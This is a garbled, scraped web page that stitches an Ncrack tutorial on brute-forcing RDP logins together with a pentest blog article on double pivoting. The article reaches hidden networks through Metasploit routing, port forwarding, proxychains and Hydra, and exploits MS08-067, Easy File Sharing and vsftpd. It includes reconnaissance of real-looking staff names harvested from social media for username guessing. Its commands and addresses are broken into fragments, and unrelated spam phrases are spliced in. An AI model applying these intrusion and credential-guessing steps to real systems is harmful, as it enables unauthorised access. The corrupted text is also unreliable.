Ncrack Tutorial – Remote Password Cracking Brute Force From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on various social networking websites. Those are the key IT staff: jessie taglejulio feaginshugh duchenedarmella martislakisha mcquainted restrepokelly missildine. Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname. If you are on backtrack 5 or backtrack 5 R1 than there is no need to install Ncrack because it is available by default but for other Linux distribution like Ubuntu you need to install it.
Developers of NMAP, a network port scanner and service detector offering stealth SYN scan, ping sweep, FTP bounce, UDP scan and operating system fingerprinting.
Information gathering. Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan. Nmap ping scan, go no further than determining if host is onlinenmap - s. P 1. 92. 1. 68. 5. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out. Run the terminal server client from the Linux boxtsclient 1.
Hugh Duchene credential ! You will get all the latest updates at both the places.
Explore Hidden Networks With Double Pivoting – Pentest Blog. An n- layered security architecture is created to protect important services required by the concept of Defense- in- Depth, which has an important place in the world of information technology. In this article, we will analyze with examples how the attackers can access the hidden networks that have no accessibility in the first stage, by using pivoting methods. What is Routing ? The process of determining how devices in different networks communicate with each other is called routing. Routing is usually performed with devices called “routers”.
The routers, routes the network packages to the respective destinations by using the routing table. Routing can be done not only with network devices, such as routers, but also with any computer that has the operating system installed on it. According to the example in the above figure, inorder to successfully communicate between 1.
According to the rule defined in the router, access is made from “1. Adventure of a network package is as follow: Is the IP address to be accessed on the local network? And the package is sent to the internet. What is Pivoting ? A rabbit hole from Alice in Wonderland. Basically, it is the process of accessing networks that we do not have access to under normal circumstances by using compromised computers. Network isolation will be useless in case of compromise a computer that has a access to the multiple.
With this method, an attacker who performs routing on the compromised systems can access the hidden networks. Every request to be made to the newly discovered network is transmitted over the Pivot. It’s like a kind of tunnel. As seen in the above topology, the device that has two NICs has access to the both 1. Under normal circumstances there is no access between these two networks - unless a routing rule is defined.
According to this structure, the authorized user, who is using the computer with two NIC cards, has to access some services in the DMZ. Compromise First Pivot and Port Forwarding. According to our attack scenario, meterpreter shell obtained in the system named as RD is also connected to the DMZ network.
Later, it is determined that the target has two NICs with the information gathering process. Note: The router in the environment does not route between networks. The attacker must first define the routing rule on RD to do this operation.
It is quite easy to do this with Metasploit. The following command can be used to create the routing rule via the current meterpreter session. JC is another computer found in hidden network - 7. There is another metasploit module that also meets this need. Use of socks. 4 proxy as metasploit module: meterpreter > background. Multiple proxy servers can be used in this tunneling technique.
In addition to providing anonymity, applications such as pivoting can also be used to direct traffic to new networks discovered. In the last line of the file /etc/proxychains. Network packages will be delivered to the destination via the defined proxy. Please report any incorrect results at https: //nmap. Before going further with exploitation, we will cover a another technique for traffic routing called as port forwarding.
Port Forwarding. Port forwarding is one of the basic steps of pivoting. Direct access to certain services running on discovered systems on the hidden network may not be available (web servers, etc.). This is because there is no double sided routing. We know how to reach the target system and make a request, but our requests will fail because the target does not know how to reach us. For this reason, we route a port on our own system to the destination via the defined meterpreter session. The routing will work as long as this process is alive. Can T Remove Windows Server Update Services Event. There is one important point to be noted at this point, the routing we provide with the run autoroute command gives us the freedom to work in the Metasploit Framework.
But when we try to reach the target with a Kali tools, we need tools like port forwarding or proxychains. Port forwarding can be done with portfwd module which is one of the post modules of Metasploit.
Usage: portfwd . Remote: local host to connect to. Reverse: local port to connect to. Reverse: remote port to listen on.
In order to access this service, the port 2. L 1. 72. 1. 6. 0. Performing a brute- force attack on this service is quite simple. The SSH. By running Hydra in Proxy. Chains, all traffic will be routed to the target system through the compromised system.
These weaknesses were MS0. Bo. F vulnerability in Easy File Share application. Access to the target system can be achieved in both ways. Another option is to continue with the SSH access, but we will continue through MS0. Easy File Share. MS0.
Bind TCPThe module with the full path exploit/windows/smb/ms. The important point here is that bind. Since the double- sided routing is not defined, the target system will not be able to directly reach us. For this reason, it is necessary to select the Bind TCP payload type so that the target should wait for a connection on its own port. After the successful exploit operation, the connection to the port where the target system is listening will be performed. How Reverse TCP and Bind TCP connections work can be examined through the following visuals.
Setting up the MS0. Netapi exploit module with the Bind TCP payload and compromise the target: msf > use exploit/windows/smb/ms. Setting the exploit module with the Bind TCP payload and compromise the target can be accomplished with the following steps: msf > use exploit/windows/http/easyfilesharing. We need to perform information gathering again. JC named machine have two NIC like RD machine.
That means we’ve found our second hidden network (8. Name : MS TCP Loopback interface.
Hardware MAC : 0. MTU : 1. 52. 0. IPv. 4 Address : 1. Interface 6. 55. 39. Name : Intel(R) PRO/1.
MT Desktop Adapter. Hardware MAC : 0. MTU : 1. 50. 0.
IPv. 4 Address : 8. IPv. 4 Netmask : 2.
Interface 6. 55. 40. Name : Intel(R) PRO/1. MT Desktop Adapter #2. Hardware MAC : 0. MTU : 1. 50. 0.
IPv. 4 Address : 7. IPv. 4 Netmask : 2. Let’s continue information gathering by performing arp scanner on second hidden network. We will talk about that in next chapter. Double Pivoting. 8. JC system. We already have a routing rule between 1.
In the present case, network packages that comes from 1. Centre For Software Engineering Unisa Application. JC device (second compromised machine) first go to the RD device (first compromised machine), and the RD transmits those packages to the JC machine.
If the attacker who is 1. In the tools we will use outside the Metasploit Framework, we must run a new socks.
Network packages attempting to reach the 8. RD: I do not know how to access the 8. IP address. But I know the system who knows how to access it. I can direct you to it. JC: I know how to forward packets from the 7.
The final state of the compromised and discovered systems is as follows. Holy Proxychains. The Proxy. Chains tool connects the proxy servers and transmits the connection end to end. In the last phase, a new socks. By activating the Dynamic Chain setting, sequential switching between the defined proxy servers is ensured.!
Specify - s. X for Xmas Scan (https: //nmap. Please report any incorrect results at https: //nmap. Finally, it reaches its destination. When the scan result is analyzed, it will be determined that a vulnerable version of the vsftpd service is installed on 8. The following steps are taken to prepare the vsftpd exploit module in the Metasploit Framework and to compromise out final target: msf >.
Easy File Share and MS0. Successfully exploitation of MS0. Information gathering showed JC also have 2 network interface. Another routing rule defined on 7. ARP and NMAP was used on 8. Vulnerable vsftp was running on 8.
SK. Final. While the attacker’s system could only gain access to the first network he was on, he could also gain access to 2 hidden networks as a result of the attacks. We have a video that shows all instructions together.